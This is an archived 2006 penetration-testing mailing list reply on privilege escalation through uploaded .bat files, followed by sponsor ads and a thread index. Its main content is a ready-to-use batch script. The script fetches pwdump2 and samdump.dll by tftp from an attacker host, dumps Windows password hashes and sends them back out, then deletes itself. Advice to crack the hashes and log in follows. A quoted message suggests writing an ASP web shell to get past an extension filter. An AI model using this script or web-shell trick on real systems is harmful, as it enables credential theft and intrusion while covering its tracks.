Penetration Testing mailing list archives
RE: privelege escalation with .bat files
From: "Maudite" <maudite.mlrl () gmail com>
Date: Wed, 26 Apr 2006 19:49:34 -0600
Keep it simple. If you can upload and execute a .bat, I use the following a lot with metasploit and other items I can get on a machine with. I steal the password file with pwdump. If you want to upload other items just edit the following for what you want to upload (nc, adduser, shell code, root kit...). Save yourself time and have the script start and stop everything. Run a tftp server on your attack machine. I use VM ware a lot so I will have a linux iso in vm and win running as the base. So I have been using tftpd32g. Upload and execute the following. (not a windows guy don't laugh at my simple bat) Winpassword.bat _BEGIN call tftp -i [YOUR attack machine IP HERE] pwdump2.exe call tftp -i [YOUR attack machine IP HERE] GET samdump.dll call pwdump2.exe >password.txt call tftp -i [YOUR attack machine IP HERE] PUT password.txt call del /F pwdump2.exe call del /F samdump.dll call del /F password.txt call del /F TFT* call del /F winpassword.bat call cls _END tftpd is on most boxes. This one uploads, steals the password file (dump then download), then deletes itself and ends. On and off in seconds. Then use John/l0pht/rainbows to pop the passwords. Login. - Maudite maudite.mutantlogic.net This must mean something to some one: CISSP/CEH/CISA/..... -----Original Message----- From: Michael Hendrickx [mailto:michael () scanit net] Sent: Wednesday, April 26, 2006 12:58 AM To: pen-test () securityfocus com Subject: Re: privelege escalation with .bat files
However, its also set up to deny copying (or renaming to) of the following
file extensions .asp, .com, .cmd, .exe, and .dll. Interestingly, it does allow .bat files to be written onto the server.
Can't you make a .ASP file through the bat file? (echo "<%" > file.asp). When the bat is executed, it's -I think- done locally, and the ASP file can be created.. Then you can make a knock-off of aspcmd.asp or something. Just a thought, Michael -- Michael Hendrickx, CISSP, SCTA Sr Security Engineer Scanit FZ / LLC http://www.scanit.net ********************************************************************** This e-mail and attached files are confidential. If you are not the designated recipient, any disclosure, reproduction, copying, distribution, or other dissemination or use of this communication is strictly prohibited. If you have received this transmission in error please notify the sender immediately and then delete this e-mail. ********************************************************************** ---------------------------------------------------------------------------- -- This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ---------------------------------------------------------------------------- -- ------------------------------------------------------------------------------ This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request () cenzic com for details. ------------------------------------------------------------------------------
Current thread:
- privelege escalation with .bat files Ben Greenberg (Apr 24)
- Re: privelege escalation with .bat files bookworm (Apr 25)
- Re: privelege escalation with .bat files Ben Greenberg (Apr 25)
- Re: privelege escalation with .bat files Christian Bauer (Apr 25)
- <Possible follow-ups>
- Re: privelege escalation with .bat files joshuaperrymon (Apr 25)
- Re: privelege escalation with .bat files Michael Hendrickx (Apr 26)
- RE: privelege escalation with .bat files Maudite (Apr 26)
- RE: privelege escalation with .bat files Rich (Apr 27)
- Re: privelege escalation with .bat files Maudite MLRL (Apr 27)
- RE: privelege escalation with .bat files Ben Greenberg (Apr 27)
- Re: privelege escalation with .bat files Maudite MLRL (Apr 28)
- RE: privelege escalation with .bat files Maudite (Apr 26)
- Re: privelege escalation with .bat files bookworm (Apr 25)
- Re: privelege escalation with .bat files Nicolas RUFF (Apr 28)